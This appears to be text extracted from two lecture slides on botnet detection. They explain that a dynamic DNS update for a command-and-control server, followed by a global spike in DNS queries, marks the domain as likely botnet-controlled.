When a botmaster updates its dynamic DNS entry for C&C server:
there would be an observable global behavior on the Internet
specifically, bots are disconnected from the old C&C server. So, they will
query their DNS server for the new IP address of the domain name,
resulting in an increase of DNS queries to this DNS entry globally.
122
Global Correlated Behaviors – DNS
Traffic (2)
Therefore, if a network monitor discovers that a
dynamic DNS entry is updated, which follows
significant amount of DNS queries to this entry,
then there is a high probability that this dynamic
DNS domain name is being used by botnet C&C
servers.
Such a feature is unlikely to change whether a
botnet is using IRC for communication or using
HTTP for communication, unless the
communication structure is changed.
123